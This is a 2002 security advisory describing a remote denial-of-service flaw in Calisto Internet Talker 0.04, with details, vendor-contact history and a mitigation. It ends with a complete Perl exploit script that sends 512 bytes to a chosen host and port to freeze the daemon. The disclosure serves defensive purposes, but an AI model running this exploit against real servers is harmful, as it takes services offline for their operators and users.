[=================================================================] [...............:[ S e c u r i t y F r e a k s ]:...............] [.................:[ www.securityfreaks.com ]:..................] [=================================================================] Title : Calisto Internet Talker Remote DOS Risk : Moderate Software : Calisto Internet Talker Version 0.04 and prior Platforms : Linux/Solaris/Cygwin Vendor URL : http://www.arcsite.de/hp/flibble/calisto/ Discovered by : subversive <subversive@linuxmail.org> Advisory ID : SFAD02-002 .....:[ Overview : Calisto is an Internet Talker that allows many people to use telnet to connect to the server and chat. Calisto is coded in C and runs on Linux/Solaris/Cygwin platforms. It is available on sourceforge as well as http://www.arcsite.de/hp/flibble/calisto/. .....:[ Details : By sending 512 bytes or more to the Calisto daemon it is possible to freeze it, resulting in a denial of service. Calisto comes with an autorun shell script that has been written for the sole purpose of automatically restarting Calisto should it crash but unfortunately this vulnerability will not cause Calisto to crash and segfault but rather freeze until manually restarted. .....:[ Vendor Status : Vendor contacted 1st/5th/10th November 2002 but did not respond. .....:[ Solution : Due to the nature of this bug it posses as more of an annoyance than a major security threat. If your concerned with the problem then simply disable Calisto until an updated version or patch has been released. Hopefully Calisto's vendors will take notice of this advisory and do something about the problem. .....:[ Exploit - SF-talkischeap.pl : #!/usr/bin/perl # # S e c u r i t y F r e a k s # www.securityfreaks.com # # Calisto Internet Talker Version 0.04 Remote Denial of Service # # # This exploit will not cause Calisto to crash but rather cause it # to freeze until manually restarted. This actually works out better # because Calisto comes with an autorun script that would restart it # should it crash anyway. # # [ subversive[at]linuxmail.org ] - *31/10/2002* use IO::Socket; $data = "A"; $size = "512"; $freeze .= $data x $size; while($_ = $ARGV[0], /^-/) { shift; last if /^--$/; /^-h/ && do { $host = shift; }; /^-p/ && do { $port = shift; }; } if(!$host != 0) { print <<"ACTIONSSPEAKLOUDERTHANWORDS"; S e c u r i t y F r e a k s www.securityfreaks.com SF-talkischeap.pl by subversive Calisto Internet Talker Version 0.04 Remote Denial of Service Usage : $0 -h <host> -p <port> ACTIONSSPEAKLOUDERTHANWORDS exit; } my $sock = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "\nCould not connect to $host : $!\n" unless $sock; print $sock "$freeze"; close($sock); exit; -- ______________________________________________ http://www.linuxmail.org/ Now with POP3/IMAP access for only US$19.95/yr Powered by Outblaze
